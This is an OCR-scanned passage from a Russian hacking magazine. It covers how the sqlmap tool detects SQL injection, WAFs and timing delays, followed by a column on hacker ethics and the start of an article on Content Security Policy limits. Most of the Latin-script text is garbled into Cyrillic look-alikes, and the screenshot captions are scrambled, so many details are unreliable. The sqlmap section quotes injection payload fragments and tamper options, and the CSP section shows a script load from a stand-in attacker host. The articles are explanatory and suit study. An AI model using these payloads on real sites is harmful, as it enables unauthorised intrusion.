тической операции (например, 19=1183-1182), 
так и для первоначального значения (19=1), 
за!итар предупредит пользователя о том, что об- 
рабатываемый параметр, скорее всего, склонен 
к 5О!-инъекции. Это делается главным образом 
для уведомления юзера, чтобы в случае, если 
за!тар не сможет найти подходящую технику 
эксплуатации, пользователь продолжил и провел 
несколько дополнительных тестов. Например, 
если используется какой-то механизм защиты, 
нахождение метода его обхода в виде скрипта, 
обфусцирующего отправляемый рауоаа (опция 
—-Катрег=Бе{мееп), может означать разницу меж- 
ду успехом и неудачей. 

Третья эвристическая проверка делается 
в том случае, если сообщения об ошибках в СУБД 
выключены и обнаружена по крайней мере одна 
общая (не зависящая от СУБД) техника $О@1- 
инъекции (например, депепс бодеап-базеа та). 
Тогда для каждой из поддерживаемых СУБД от- 
сылается один запрос в форме, поддерживаемой 
только конкретно ею (например, в случае Му ОЕ 
14=1 АМО (ЗЕЁЕСТ 60х41597548)=@0х41597548)). 
Если пришедший ответ совпал с ожидаемым, 
то зайтар делает вывод, что СУБД идентифици- 
рована, и проводит дальнейшие тесты только 
для нее, как и в случае первой проверки. 


ВЫЯВЛЯЕМ ПРИВЕДЕНИЕ ТИПОВ 

В некоторых случаях веб-приложения использу- 
ют явное приведение типов для предотвращения 
$ОЕ-инъекций. Это особенно заметно на цело- 
численных значениях параметров (например, 
14=1). 

Если при изменении этого целочисленного 
параметра сервер возвращает разные ответы, 
а при добавлении к нему произвольной строки 
(например, 19=1\Нхг) возвращается то же самое 
значение, мы можем с большой уверенностью 
сказать, что используется приведение типов. 


мап{ф То $К1р фе${ рау\оа4$ $рес111с Тог о{Лег ОВМ5ез? [У/п] У 


4о уси мапф фо 11пс1иде а тез{$ ог 'Му50Е' ехфеп41п9 ргоу14еЧ Теуе\ (1) ап@ г1 


5К (1)? [У/п] У 


[11:52:32] [ЕВКОК] ро5515е 
['19'])"} ах те БасК-епд меб арр\1сат1оп 
4о уои мапф Фо $К1р 1По5$е К1п9 о{Р сазез$ (апд зауе сапп1пд 11те)? [у/М] у 
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В таких случаях затар предупреждает поль- 
зователя сообщением и просит выбрать, хочет ли 
он удалить текущий параметр из дальнейших ис- 
пытаний и тем самым сохранить время сканиро- 
вания. Это особенно полезно, когда пользователь 
не уверен, следует ли ему провести более деталь- 
ные тесты на данном параметре или просто про- 
пустить его и начать тестировать другие. 


ОТЛАВЛИВАЕМ ОГРАНИЧЕНИЕ НАДЛИНУ 
СТРОКИ 
Зипозт — популярный патч с открытым кодом, 
используемый для защиты серверов и пользо- 
вателей от известных и неизвестных брешей 
в РНР-приложениях и ядре языка РНР. И хотя 
он не предлагает явной защиты от $ОЁ-инъекций, 
но накладывает ограничение на длину значений 
параметров запроса (например, ограничивает 
длину значений параметров СЕТ-запроса 512 
символами). Это создает проблемы при проведе- 
нии ЗО[-инъекций в случаях, когда используются 
более длинные рауюаа`’ы (например, инжектРНР- 
шелла через оператор $ЕЁЕСТ ТМТО ОУТЕТЬЕ). 
После того как ЗОЁ-инъекция успешно иден- 
тифицирована, зайтар посылает один длинный 
запрос, содержащий простой логический во- 
прос (например, 3182=3182). Если веб-сервер 
не отвечает в нужной форме (например, пустым 
ответом), мы можем быть уверены, что на веб- 
сервере имеется какой-то механизм ограни- 
чения длины, например такой же, как уже упо- 
мянутый патч Зипозт. В таких случаях зайтар 
предупреждает пользователя, что в дальнейшей 
работе его ожидают проблемы. Единственное, 
чем можно воспользоваться в данном случае, 
чтобы попытаться избежать этой проблемы, — 
это отключить в затар механизм экранирова- 
ния строк (где, например, запросы типа $ЕТЕСТ 
'Кообаг' для МУЗОЁ превращаются в $ЕТЕСТ 
0х666Е6Е626172), используя ключ --по-езсаре. 


1птедег са511п9 детесфед (е.д. "$19=1п{%уа1 ($ ВЕСДУЕ$Т 


Значение параметра! 4 приводится ки\едег с помощью п\уа(() 


[МАВМТМС] рагатетег 1епд{п соп5Тга1п{ теспап15т детестед (е.д. 541051 


Ротеп{1а1 ргоб\ет$ 1п епимега{1оп рпазе сап Бе ехрестед 


Зайтар определил, что целевая СУБД — МуЗ ОЕ [12:02:17] 
п ратсп). 


Выявили наличие ограничения надлину параметров 


[МАВМТМС] 1{ арреаг5 ТПа{ф {Пе Тагдет 15 рготесфед. Р\еазе соп51дег 
оф Татрег $сг1рф5 (орт1оп '--Татрег') 


Похоже, что цельзащищенавеб-файрволом 


до уси мап1 то 1пс1иде а те$1$ Тог 'Му50Е' ехфеп41п9 ргоу14ед 1еуе\ (1) апд г1 
5К (1)? [\/п] У 


Определяем СУБД с помощью третьей эвристической проверки 


Проверка показала, что параметр {А может быть уязвим к ЗО -инъекциям 
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За!тар идентифицировал установленный Моа$есигКу 


Зайтар обнаружил ложное срабатывание 


Таким образом, рауоааЧ’ы станут более коротки- 
ми, но при этом мы рискуем тем, что одинарные 
кавычки (') могут быть экранированы (например, 
с помощью РНР-функции ту$а1_геа1_езсаре_ 
5$4г1п8()), а полезные нагрузки станут более за- 
метными в логах веб-сервера. 


ОБНАРУЖЕНИЕ \!АЕ 

М/АЕ-продукты (меб аррйсаНоп Ягема! — бранд- 
мауэр для веб-приложений) — широко исполь- 
зуемый механизм для предотвращения злонаме- 
ренных атак на веб-приложения. Каждый из них 
может быть опознан как с помощью уникального 
ответа на обнаруженную атаку, так и через встав- 
ку конкретного НТТР-заголовка (заголовков). На- 
пример, МоаЗеситу возвращает 501 НТТР код 
ошибки при обнаружении атаки, в то время как Е5 
В!@-!Р добавляет свой собственный Х-Спесйоп 
НТТР заголовок в ответ. 

Зайтар включает в себя функции обнаруже- 
ния (ключ --сИеск-мАЕ) и распознавания (ключ 
--1Аеп1+Фу-мМАЕР) около 30 различных \МАЕ (таких 
как Атоск, Ваггасчаа и другие). Для обнаружения 
работы веб-файрвола используется намеренно 
созданный подозрительный ЗОЁЕ тесйоп рауюаа 
в качестве значения неиспользуемого параметра 
со случайным именем (например, 1+7ху). Если 
в результате отправки такого запроса веб-сервер 
возвращает содержимое, заметно отличающееся 
от оригинала, зайтар может решить, что какой-то 
механизм защищает целевое веб-приложение. 
Для идентификации \МАЕ используются не- 
сколько различных «полезных нагрузок», харак- 
терных для различных атак на веб-приложения, 
приходящие ответы анализируются в скриптах, 
отвечающих за идентификацию различных веб- 


| Зашарв 


= 
| 


| какАШОо 


ключает в себя 
ния (--снеск-УТАР) и распознавания (--епН{у- 
У/АЕ) около зо различных У 2 
ск, Ваггасида и другие 


--Нте-зес 


'--Е1те-зес')? [У\/п] У 


5.1.41-3-6ро50+1 


Тите-Базе техника в действии 


файрволов (директория ма внутри затар). 
В случае успеха скрипт вернет зайтар логическое 
значение {гие, чтобы сообщить, что целевой \М/АЕР 
успешно обнаружен. 


ОБНАРУЖЕНИЕЛОЖНЫХ 
СРАБАТЫВАНИИ 

Ложное срабатывание (или ложная тревога) — 
это термин, используемый для описания резуль- 
тата, который показывает, что данное условие 
присутствует, когда на самом деле это не так. 
Это реальная проблема, потому что у пользо- 
вателя возникает ложное чувство уверенности, 
когда на самом деле в веб-приложении абсо- 
лютно нечего эксплуатировать. Это особенно 
заметно в Бодеап-базея и Ите-базеа слепых 
методах. В случае Бооеап-базеа, если целе- 
вое веб-приложение содержит динамические 
части (например, рекламу), или в случае Ите- 
разеа, если время ответа веб-сервера включает 
в себя значительные сетевые задержки, инстру- 
менты для автоматического обнаружения $01- 
инъекций могут запросто сделать неправильный 
вывод. 

Чтобы избежать такого рода ошибок, после 
фазы обнаружения зайтар проводит простые 
тесты. В случае если целевое веб-приложение 
не в состоянии ответить ожидаемым образом 
на предопределенную логическую операцию (на- 
пример, 149=1 АМО 95>27), зайтар может сделать 
заключение, что он имеет дело с Та5е розй\е. 

Заитар проводит такого рода тесты только 
в тех случаях, когда никакие другие методы, кро- 
ме слепых Бооеап-базе и {ите-базеа техник, 
уже не доступны для использования, так как лож- 
ные срабатывания обычно возникают из-за не- 


функции обнаруже- 
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Значительные задержки во времени ответов, надо установить большее значение 


4о уои мапф $91тар То Тгу То орт1т1хе уа\ие($) Тог ОВМ$ де\ау гезроп5ез (орт1оп 


Зайтар предлагает оптимизировать значение задержки 


детерминированной природы дифференциации 
ответов веб-страницы. Это означает, например, 
что если целевое веб-приложение возвращает 
ожидаемую строку в случае метода, основанного 
на ошибках (егтог-базеа), то нет никакой необхо- 
димости в такого рода тестировании. 

Нередки также случаи, когда значения вход- 
ных параметров предварительно обрабатыва- 
ются, чтобы отфильтровать и/или закодировать 
специальные символы (например, при помо- 
щи РНР-функции П%т15рес1а1спаг$()). Так 
как зайтар активно использует знак «больше» (>) 
для операции сравнения в слепом боодеап-базеа 
и Нте-базе методе, это будет препятствовать 
его нормальной работе. Соответственно, поль- 
зователю выдается предупреждение, что ему 
следует перезапустить программу, выбрав под- 
ходящий сценарий для обфускации рауюаод’а (на- 
пример, --+атрег=Бе{мееп), чтобы решить дан- 
ную проблему. 


ОБНАРУЖЕНИЕ ЗАДЕРЖКИ 

В технике слепого метода, основанной на изме- 
нении времени (#йте-базеа), атакующий пытается 
сделать преднамеренную задержку в ответе сер- 
вера на основе условного выражения, содержа- 
щего в себе вопрос, который является «истиной». 
Измеряя время отклика целевой системы, он мо- 
жет сделать вывод. Если цель отвечает с замет- 
ной задержкой, атакующий может сделать вывод, 
что ответ — {гие, в то время как в случае, если 
цель отвечает обычным образом, он может сде- 
лать вывод, что ответ — тае. 

Задержка в сети, из-за своей недетермини- 
рованности, является главным врагом временной 
техники. Если, скажем, сервер отвечает за одну 
секунду, а диапазон нормального времени 
для отклика составляет от 0,5 до 1,5 с, то очень 
трудно сделать вывод, является ли ответ {гие или 
Та]зе. Другой случай — когда не установлено кон- 
кретное значение параметра промежутка време- 
ни, как в рауюаа’ах на базе тяжелых запросов (на- 
пример, $ЕТЕСТ СОУМТ (*) ЕВОМ АГ: _9$ЕВ$ Т1, 
Т2 АГЕ Ц95ЕК$, АЁЁЕ Ц95ЕК$ ТЗ, Т4 АЕЁ У$ЕВ5). 
В этих случаях нет простого способа определить, 
имела место задержка или нет. 
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Подбор количества полей с помощью ОВВЕВ ВУ условия 


Подбор количества полей спомощью УМОМ АЦ. ЗЕЪТЕСТ 


зайтар использует математическую статисти- 
ку, чтобы отличить гие от та5е ответов. В начале 
запуска программа изучает, что «нормально», 
а что нет. Время ответа обычных запросов и не- 
сущих боевую нагрузку, не использующую меха- 
низм задержки (например, Бооеап-Базеа слепой 
метод), записываются как нормальные и собира- 
ются для дальнейшей обработки. В случае если 
есть необходимость собрать их побольше, дела- 
ется еще пара фиктивных запросов. 

Когда нужно сделать заключение, была за- 
держка или нет, рассчитывается колоколообраз- 
ная кривая (Гаусса) нормального распределения. 
Все, что нормально (то есть не намеренно затя- 
нуто), должно располагаться под кривой с высо- 
кой вероятностью. Точнее, если задержка имеет 
значение меныше, чем значение верхней границы 
ц(Т) + 76(Т), гдец — среднее значение, а с пред- 
ставляет собой стандартное отклонение времени 
отклика, вероятность того, что мы наблюдаем 
нормальный ответ, 99,99%. 


Кривая 
нормального 
распределения 


0.1% 


За кулисами 5д/тар 


Чем уже колоколообразная кривая, тем луч- 
ше. В случае значительной задержки в сети более 
высокие значения задержки (если применимы) 
будут необходимы, чтобы использоваться для вы- 
полнения уравнения, так как мы хотим выйти 
за пределы «нормальности». Если мы сможем это 
сделать, то будем способны различать с высокой 
точностью, где есть задержка, а где ее нет. 

зайтар автоматически вычисляет параметры 
гауссовой колоколообразной кривой и сравни- 
вает со временем ответов. Если есть признаки 
значительной задержки сети, программа пред- 
упреждает пользователя, чтобы он использовал 
настолько высокое значение задержки (если это 
применимо), насколько это возможно. Кроме 
того, с другой стороны, в случае если исполь- 
зуемое значение задержки существенно выше, 
чем указанное верхнее значение границы, зайтар 
автоматически оптимизирует значение задержки 
до более подходящей, что сократит время пере- 
бора. 
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ПОИСК КОЛИЧЕСТВА ПОЛЕЙ В ЗАПРОСЕ 
Чтобы успешно использовать ЧУМЮ\М-технику, 
нужно знать число полей, участвующих в уязви- 
мом запросе. Основной метод — это исполь- 
зование условия ОАПЕН В\. В случае если ответ 
для произвольно большого значения (например, 
ОКОЕК ВУ 9143) резко отличается от нормально- 
го ответа, за!тар постарается выяснить количе- 
ство полей запроса с помощью адаптивного ал- 
горитма бинарного поиска. В нем пространство 
поиска разделено на большие отрезки (напри- 
мер, размером 10), последовательным образом 
определяется нужный отрезок, внутри которого 
задействуется классический алгоритм бинарного 
поиска. Поиск осуществляется до тех пор, пока 
не находится такое значение №+1, которое имеет 
совершенно другой ответ по сравнению со значе- 
нием для М. В этом случае зайтар может с высо- 
кой вероятностью сделать вывод, что количество 
полей в уязвимом запросе равно М. 

Если метод ОНОЕВА ВУ неприменим, за!тар 
будет использовать подход, как при обнаружении 
задержки. Постоянное значение поля (например, 
МИЕЕ) будет использоваться в текущем отрезке 
поискового пространства в УМТОМ АГ $ЕТЕСТ вы- 
ражении, а ответы будут записываться. Если ответ 
на определенное количество полей, по сравнению 
с оригинальным ответом, выделяется из остальных 
статистическим образом, эайтар может с высокой 
вероятностью сделать вывод, что нашел нужное 
количество полей, участвующих в уязвимом запро- 
се. Так как результаты ответов с неверным количе- 
ством полей не будут значительно отличаться друг 
от друга, ответ с правильным количеством обя- 
зательно проявится в сравнении с ними (то есть 
он не будет подходить под колоколообразную кри- 
вую Гаусса). Если такого значения нет в текущем 
отрезке поиска (например, 1-10), за!тар перейдет 
к другому, в зависимости от используемого уровня 
тестирования (опция --1е\е1). 


ЗАКЛЮЧЕНИЕ 

Видишь, сколько разнообразных техник было 
собрано в одной тулзе, чтобы максимально 
упростить нам жизнь. Недаром зайтар — очень 
популярный среди пентестеров всего земного 
шара инструмент для проверки веб-приложений 
на наличие уязвимостей ЗОЁЕ тмесйоп. Надеюсь, 
теперь, когда ты представляешь, как все устроено 
изнутри, ты сможешь использовать возможности 
программы на все 100%. = 


АА 


Подробная 
документация 
по использованию 
затар: 
Би.[уЛа Т МРе 


0.1% 
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КОЛОНКА 
АЛЕКСЕЯ 
СИНЦОВА 


ИСНОВА 
ОБ ЭТИЧНОСТИ 


НОВЫЕ КОРОЛЕВЫ ДРАМЫ 


В этот осенний день можно порассуждать о том, что есть «этич- 
ность» хакера в наше время. Да, тема не техническая, но важ- 


Известный м/ПНе Пат, докладчик на $еситу- 
конференциях, соорганизатор (его №М9$ 
и просто отличный парень. В данный момент 
занимает должность Рипсра! Зесищу 
Епдтеегв компании МоКта, где отвечает 
за безопасность сервисов платформы НЕВЕ. 


аверняка все слышали историю про очень «этичного» 
хакера из Палестины: он молодец, он потратил время 
и нашел вполне себе стандартную ошибку в Гасероок. 
Все бы хорошо, но он не смог толково написать ре- 
порт команде фейсбука, в результате чего получил ответ, что, 
мол, это не бага. Он попробовал еще раз и опять не смог объ- 
яснить. Бывает. Но нет, вместо того, чтобы написать еще одно 
письмо с подробным описанием угрозы, он начал демонстра- 
тивно использовать эту ЧУДОВИЩНО опасную уязвимость 
(постить на стене у любого пользователя, даже у не друга... ну 
ты понял, мы все умрем), пытаясь поднять свое ЧСВ. 

Этично? Даже если фейсбук затупил, это не значит, что надо 
устраивать порнографию из-за примитивного бага, но нет: 
ЧСВ и жажда халявных денежек заставили выбить максималь- 
ный профит из ситуации. Особенно смешно, что в итоге со- 
общество бросилось защищать парня. Эта история лишний 
раз показывает, что планка ценностей сильно изменила свой 
уровень и ориентацию. 


КОГДАЯБЫЛ МОЛОД 

Во времена, когда свирепствовала И! УМСОВПЕ и \\МпМике 
ООВ, я не думал об ИБ как индустрии, о том, что это может 
приносить деньги (легально или нет), пиар и прочее. В отли- 
чие от того, что мы имеем сейчас, рука закона не была сильна 
в интернете (и сейчас не во всех странах она сильна, но все 
же прогресс заметен). И в то время основной мотивацией 
была не жажда выгоды, а возможности, энтузиазм, цели и мо- 
ральные ценности. Если тебе хотелось кардить и ты считал, 
что воровать «электронные деньги» — это ОК, то ты это делал. 
Кого-то ловили, но большинство нет. Если считал, что дампить 
пароли от @а!-ир, используя незакрытые шары или ЗибЗеуеп 
с ВаскОпйсе, — это ОК, то ты это делал. Особенно учитывая, 
что дампить пароли можно было не у соседа, а, например, 
в США, у пользователей с «роумингом», и использовать эти 
данные в Питере, имея локальный номер пула х25 какого-ни- 
будь «Спринта». То же самое с популярной дефейс-сценой. 


ная, ведь в первую очередь мы люди, а все остальное потом :). 
Ну и конечно же, все написанное — просто МНО и рефлексия. 


Команды конкурировали друг с другом за количество дефей- 
сов, за популярность взломанного ресурса и даже за красоту 
и стиль :). 

Причины были разные: политика, фан, выгода, кто-то добы- 
вал деньги — спамом, продажей виагры и викодина, внедряя 
баннеры партнерки на взломанные ресурсы. Технически мир 
не сильно изменился. Да, некоторые умники говорят, что вот 
тут кибервойна и АРТ. Но те же АРТ и операции под заказ ка- 
кого-либо государства выполнялись и тогда, хотя их размах 
и влияние были несколько меньше уровнем. Но в остальном 
было все то, что есть и сейчас, — вирусы, трояны, эксплойты. 
Зато в этике изменения гораздо более заметны. Изменилось 
само понятие, и интерпретация стала крайне гибкой. 


ЧТО ПОМЕНЯЛОСЬ? 

Когда что-то становится популярным и востребованным, 
то возникает нехватка кадров и при этом снижается входной 
порог. Открываются двери для тех, кто ведется на моду, кажу- 
щуюся простоту дела, высокие доходы. И тут начинаются ин- 
тересные вещи. 

Возьмем классику: сделать дефейс с красивой картинкой 
и вежливым текстом, мол, админ, напортачил ты тут, так что вот 
тебе картинка на главной странице, ноты не волнуйся, мы бэкап 
паех.Мт! сделали, авоттебе мой етай, пиши, скажу, в чем бага 
была (или сам по логам смотри)! Раньше такой ход в отношении 
мелкого сайта для узкого круга посетителей был... хмм... почти 
этичным и красивым ходом, с примесью романтизма. 

Где тут этика? Только в поведении: если это мелкий биз- 
нес или персональный проект, то никакого ущерба репутации 
и прочих рисков нет. Да даже если это банк — только С!$О 
и консультанты ИБ верят, что от дефейса страницы банка бу- 
дет ущерб репутации. Если и будет, то маленький и недолгий. 
Посмотрите на громкие взломы — 5Куре, Ипкеат и многие 
другие. Это уже не просто дефейс, и ущерб для таких компаний 
более чувствителен, ведь затрагивает всех пользователей сра- 
зу. И что? Абсолютно ничего. Ерунда эта ваша ИБ! 
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Ъ Именно крупные СМИ создаютшум 


Но консультантов, менеджеров и С!1$О понять можно — им 
нужна работа, а значит, надо сеять страх и продавать услу- 
ги. И многие начинают тупо врать и даже не хотят понимать, 
что это преувеличенная «не совсем правда». Многие доклады, 
даже с Наск Наф, многие отчеты об уязвимостях и «исследо- 
вания» очень и очень преувеличены и раздуты. 

Но почему я заговорил об этом? Найти проблему и опи- 
сать ее — это нормально, но начинать поднимать шум ради 
рекламы — уже нет. И это тенденция. Мне часто приходят ре- 
порты об уязвимостях и возможных атаках типа Х$$/СЗВЕ/ 
С!скК]фаскта, в которых так называемые «этичные» хакеры 
говорят, что это МЕСА_ЧЁТВА_НС@Н_САГИСАЁЕ О\ММАЗР ТОР- 
10 уязвимость, и страшно довольны :). После того как их до- 
бавят на стену славы, они начинают устраиваться на работу, 
подавая эти «стены славы» как пруф, что они мегакруты. Это 
к вопросу о пороге вхождения. Если раньше хакеры вылупля- 
лись из программистов и админов, людей, которые понима- 
ли, как можно использовать систему, программу нестандар- 
тно, то теперь рулит шаблонизация: вставь кавычку, напиши 
аещ(1). А это уже немного не то... 


МОМОВЕРВЕЕВОС$ 

Я понимаю, что за работу надо платить, но именно тут и за- 
рыта странная собака: многие не просят никого искать баги, 
то есть, выполняя добровольную работу, что-то за нее тре- 
бовать и искать уважения за умение вставлять кавычки — это 
неэтично :). Уважение и респекты ресерчер получает не за то, 
что нашел, куда впихнуть кавычку, а за то, что с чистой душой 
сдал ее вендору, потому что не хочет, чтобы этот проект был 
дырявым. Многие вендоры поощряют этот подход через Вид 
Воиту программы, но ценится именно не рыночное отно- 
шение, а человеческое и то, что обе стороны могут получить 
профит и остаться друзьями. Например, самый популярный 
коммент в блогах на тему недовольства поведением вендо- 
ра — «Лучше бы на черном рынке продал!» Ну что ж, о какой 
этичности тут речь... Умеешь искать уязвимости и хочешь 
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за это деньги — иди в «эксперты по анализу защищенности 
веб-приложений на наличие Х$5$». Кроме того, те же баг ба- 
унти: читай оферту — ты знаешь, что тебя ждет, и, даже если 
вендор залажал или не понял тебя (всякое может случить- 
ся), постарайся быть человеком, а не строить наивные выво- 
ды о мнимых причинах возникшей проблемы :). 

Совсем по-другому обстоит дело на рынке 0-дау для бра- 
узеров и прочих клиент-сайд-плагинов. Там создать боевой 
эксплойт достаточно трудоемко, и все меньше и меньше лю- 
дей делают это ради фана и идеи. Учитывая популяризацию 
«производства кибероружия», такая работа становится дей- 
ствительно высокооплачиваемой, и ни о какой этике речь 
уже не идет — это бизнес. Хотя и тут есть люди, которые 
просто могут найти уязвимость, не тратя силы на эксплойт, 
помочь вендору закрыть проблему ради просто человече- 
ского отношения. Но тут и вендорам надо понимать: игно- 
рировать проблему уязвимостей в их продукте или надеять- 
ся на халяву от людей, которые потратили силы и сделали 
работу, — неэтично. Если человек создал эксплойт под ваш 
продукт — он может им распорядиться по-своему. Именно 
поэтому многие и делают Вид Вочту программы: даже по- 
иск тупых Х$$ — это какая-никакая, но работа, и люди до- 
стойны как минимум благодарности за то, что помогли сни- 
зить процент ваших косяков и в продакшне. 


ЗАЧЕМЯВСЕ ЭТО ПИСАЛ? 

Если вынести за скобки проблему творческого кризиса, 
писал я это потому, что эту тему принято считать мелкой, 
не технической, очевидной. Но не хотелось бы, чтобы 
уровень адекватности падал. К сожалению, чем популяр- 
нее тема ИБ, тем это чаще происходит. Я понимаю, ныть 
не дело, но если реально оценивать хотя бы себя и свою 
работу и сопоставить это со своими этическими нормами 
и стем, что происходит вокруг, то можно понять нечто по- 
лезное и как-то себя улучшить. Вот этого я нам всем и же- 
лаю! 2= 
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Сотеп+5есищту Ро!/су — опасная политика 


Обзор нового веб-стандарта 
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Чтобы идти в ногу со временем, браузеры внедряют все новые технологии для обеспечения 
безопасности пользователей. Одна из них — Сощет Зеситу Ро/Гсу, позволяющая разработ- 
чикам сайтов четко объяснить браузеру, на какие адреса тот может выполнять межсайтовые 
запросы. Однако новый веб-стандарт страдает от существенных недостатков, ставящих под 
сомнение его пригодность как защиты от Х$5. 


СОМТЕМТЗЕСУНТУ РОЦСУ \!$ ЗАМЕ ОВ!С!М РОМСУ 
Одним из главных принципов безопасности браузеров и веба 
в целом является Зате Опат Ройсу — дословно «политика 
единого источника» (устоявшегося термина до сих пор не су- 
ществует). Ее суть заключается в проверке трех компонентов, 
из которых состоит опдт: протокол, хост и порт. Если страница 
Пр:/Лез .ги/а.П1ит! пытается получить доступ к РОМ страни- 
цы ПЁр://4е${2.ги/б.пти[, то у нее ничего не выйдет, так как хо- 
сты отличаются. Если бы ЗОР не существовал, любой сайт мог 
бы делать запросы на произвольные адреса и получать оттуда 
данные, что, как подсказывает логика, не есть хорошо. Причем 
страдали бы все: как пользователи, чьи персональные данные 
летали бы без принуждения, так и владельцы ресурсов, — в об- 
щем, в вебах творился бы полный хаос. Поэтому Зате Опат 
Ройсу всех спасает, и все счастливы. Однако есть одно но: что, 
если на страницу ПИр:/Лез1.ги/а.Ми! внедрен злой скрипт 
с сайта ПЁр:/Дез{2.ги/, который делает плохие штуки в контек- 
сте браузера жертвы? В данном случае ЗОР бесполезен, ибо 
на <5сг1рЕ 5гс="..."> политика не распространяется. Что же 
делать? 


СЗРДЛЯВСЕХ 

На помощь приходит новый стандарт — Сощет Зесищу Ройсу, 
основное предназначение которого состоит в том, чтобы за- 
щитить пользователя от угроз межсайтового выполнения сце- 
нариев. Изначальный вариант спецификации был разработан 
в Мо7Ша ЕоипааНоп. Первым браузером с поддержкой С$Р стал 
ЕгеТох 4.0, который вышел в марте 2011 года. С конца 2012 года 
СЗР 1.0 находится в\/ЗС на стадии принятия как веб-стандарта. 
На данный момент разрабатывается спецификация СЗР 1.1. 
Согласно статистике сайта Закоищег.сот, на момент написа- 
ния статьи полную поддержку Сощет Зесигйу Ройсу имели бо- 
лее 60% браузеров по всему миру. 

Флагманами выступают Етеох и Спготе, которые раньше 
всех внедрили реализацию СЗР в качестве экспериментальной 
фичи и с недавнего времени перешли на полную поддержку. 
В техническом плане это означает, что директивы СР помеща- 
лись во временный НТТР-заголовок с префиксом (Х-Сощепт- 
Зесийу-Ройсу в Егетох и Х-М№Мебки-СЗР в Спготе), а сейчас 
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используется стандартный заголовок (Сотщещ-Зеситу-Ройсу). 
В ичете Ехр!огег по традиции все печально: СЗР работает 
только с версии 10.0 и в очень урезанном виде. 


КАК РАБОТАЕТ С$Р 

Главный смысл СЗР в том, чтобы позволить разработчикам 

сайтов в явном виде объявить белый список источников, отку- 

да могут быть загружены данные для разных типов ресурсов. 

Принцип «что не разрешено, то запрещено» позволяет сни- 

зить риск обхода политики. СЗР дает возможность определить 

разрешенные списки с помощью следующих директив: $сир{- 
гс, ЮП-$гс, Нате-$гс, итда-гс, те а-згс, ощес{-$згс, зУе-згс. 

Как нетрудно догадаться, зсир{-$гс задает вайт-лист значений 

для атрибута $гс тега <зсг1р+>, Пате-$гс — тега <гате>, те а- 

$ГС — <\1аео0> и ‹аца1о> итак далее. Кроме того, есть директива 

ЧетаиК-згс, которая имеет силу, когда директива для конкретно- 

го типа ресурса не объявлена. 

Имеется четыре ключевых слова, которые, помимо ЧУНЕ, мо- 
гут быть использованы в качестве источника: 

.  зе№означает текущий опдт (протокол, хост, порт); 

. попе — запрещает все; 

. ипзае-шше — разрешает использование «инлайн» +5$- 
скриптов, то есть кода в теге <сг1ре> прямо на странице; 
также имеет аналогичное значение для тега <5%у1е> и С$$- 
СВОЙСТВ; 

. ипзае-еуа! — разрешает выполнение чуауаЗспр{-кода 
как строки с помощью функций ема!, зе? итеощ и зейщжегма!. 


Помимо прочего, могут использоваться вайлдкарды для лю- 
бой части УРЕ, например *: //4е5*.ги:* применяет политику 
для хоста \е${.ги с любым протоколом и портом. 

Чтобы лучше понять, как работает СР, рассмотрим такой 
пример. Страница ПЁр:/Ле$.ги/а.Пт! задает следующую по- 
литику с помощью НТТР-заголовка (также возможно использо- 
вать тег <тефа>): 


НТТР/1.0 200 ОК 
Сопфеп* -5есиг1%у-Ро11су: аефаи1-згс '5е14'; «= 
5сг1ре-згс Ир: //сап.е5*.ги Ир: //азах. == 


Вигр 5иЙе Егее ЕЧИ оп \1.5 
| Вигр !пёгидег Вереаёег \ММпдом Нер 


Тагае! | Ргоху | 5р!4ег | 5саппег | пёгидег | Вереаег | бедиепсег | Бесодег | Сотрагег | ОрНопз$ | Дей$ 


| РоНо\ гедгесвоп ) Тагде!: ВЕр$:/тоБИе.{м/Икег.сот |.) |?) 


[ыыы бо Сапсе | < | 
Ведце${ 


Ва\м | Неадег5 | Нех 


СЕТ / НТТР/1.1 | 
Нозе: шор11е.сы1ссек . сом 

Ассерс: */* 

Ассерс-ГЬапдцаде: еп 

Озек-Адепе: Мо2111а/5.0 (М1паомз МТ 6.2; 
ЗаЁак1/ 537.365 

СоппесЕ1оп: с1озе 


МОМЕ4) Арр1емеьК1/537.36 (КНТМЬ, 11ке беско) Свкоше/30.0.1599.17 


|" 


зеагсвВ ёегт 0 таЕсВез 


(ви) ==) | (=) Туре а 


Везроп5е 


| Вам | Неадегз | Нех | НТМЕ | Вепдег ] 

зес-соок1е: | 
_тмор11е_зезз=ВАВ7Воьст\УчХ2 1к55ТрМов 142 о о а аеы 
Эее82 5530414с9Ъ9аЕе{65а03; разв=/; ехр1кез=Тие, 29-Осе-2013 18:28:25 


зес-соок1е: дцезс _14=у1%3А137804380849599590; Роша1п=.см1ссек.сом; тн ем Ехр1кез=Тие, 01-5ер-2015 13:56:48 ОТС 
зтасиз: 302 Роцпа_ 

35Е1с6-сСкгапзрокс-зесик1$у: пшах-аде=631138519 

уаку: Ассерс-Епсоа1па 

х-Екаше-орс10п3: ЗАМЕОВТС1М 

х-кипе ие: 31 


Соппесе1оп: с1озе т 


(ам) ош) [вши [м] 


Бопе Гепо{Й: 1 784 (287 тИИз) 


Туре а 5еагсп &егт 0 таЕсНез 


&> Взлом 


50051еар1$.сом; 1т8-згс Пр: //сап.е$*.ги; «= 
$фу1е-згс Ир: //сап.Фе${.ги 

Сопфепе-тепёЕИ: 4242 

Соппес1оп: с1о5е 


В данном случае С$Р разрешает выполнение скриптов толь- 
ко с хостов сап{4ез1.ги и аах.доод!еар!$.сот, загрузку изобра- 
жений и стилей — с сап4е$.га, для остальных типов ресурсов 
определен кейворд зе например отправка АЗАХ-запросов 
(соппес{-$гс) разрешена только на текущий опа. 

Если атакующий имеет Х$$ и попытается вставить скрипт 
со своего сайта, то браузер заблокирует его выполнение и вы- 
ведет в консоль сообщение следующего вида: 


Вефизе фо 1оаа Пе $зсг1ре "Ир: / /аЕасКег.ги/+= 
х55.]5' Бесаизе 1% \у10]1афез {Не №о11ом1пё Сопфепе ‹= 
5есиг1Фу Ро11су 91гесЕ1\уе: "$сг1ре-згс Ир: //сап. «= 
фез*.ги Ир: //а)ах.50081еар1$.сот". 


Атеперь, когда кажется, что все прекрасно, самое время по- 
говорить об ограничениях С$Р, которые могут привести к обхо- 
ду политики. 


ОГРАНИЧЕНИЯ С$Р 

С позиции веб-разработчика правильно и грамотно развер- 
нуть СЗР на своем ресурсе довольно проблематично, так 
как для каждой страницы необходимо устанавливать отдельную 
политику. В настройке С$ЗР ему может помочь такая директива, 
как геро[-ий, с помощью которой он может получать от браузе- 
ра информацию о всех нарушениях политики. Отчет о наруше- 
нии СР может выглядеть следующим образом: 


{ 


"сзр-герог*": { 
"аоситеп{-иг1": "Вр: //Жез*.ги/а.Ит1", 
"гефеггег": "ПЕЁр: //Фезе.ги/", 

"Б1оскеа-иг1": "ПЕЁр: //аЕЖасКег.ги/х$$5.]5", 
